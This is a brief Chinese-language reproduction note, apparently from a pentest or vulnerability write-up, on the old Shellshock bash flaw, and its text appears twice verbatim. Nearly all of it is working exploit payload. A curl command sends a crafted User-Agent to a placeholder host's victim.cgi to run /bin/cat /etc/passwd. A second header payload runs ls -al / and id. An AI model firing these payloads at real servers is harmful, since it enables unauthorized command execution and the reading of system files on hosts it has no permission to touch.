(2)这个漏洞的复现特别简单,是乌云shellshock漏洞,bash破壳的老洞:
exp:
curl -A "() { :; }; echo; /bin/cat /etc/passwd" http://xx.xx.xx.xx:8080/victim.cgi
exp:
User-Agent: () { :;};echo;echo $$(/bin/ls -al /);/usr/bin/id;
(2)这个漏洞的复现特别简单,是乌云shellshock漏洞,bash破壳的老洞:
exp:
curl -A "() { :; }; echo; /bin/cat /etc/passwd" http://xx.xx.xx.xx:8080/victim.cgi
exp:
User-Agent: () { :;};echo;echo $$(/bin/ls -al /);/usr/bin/id;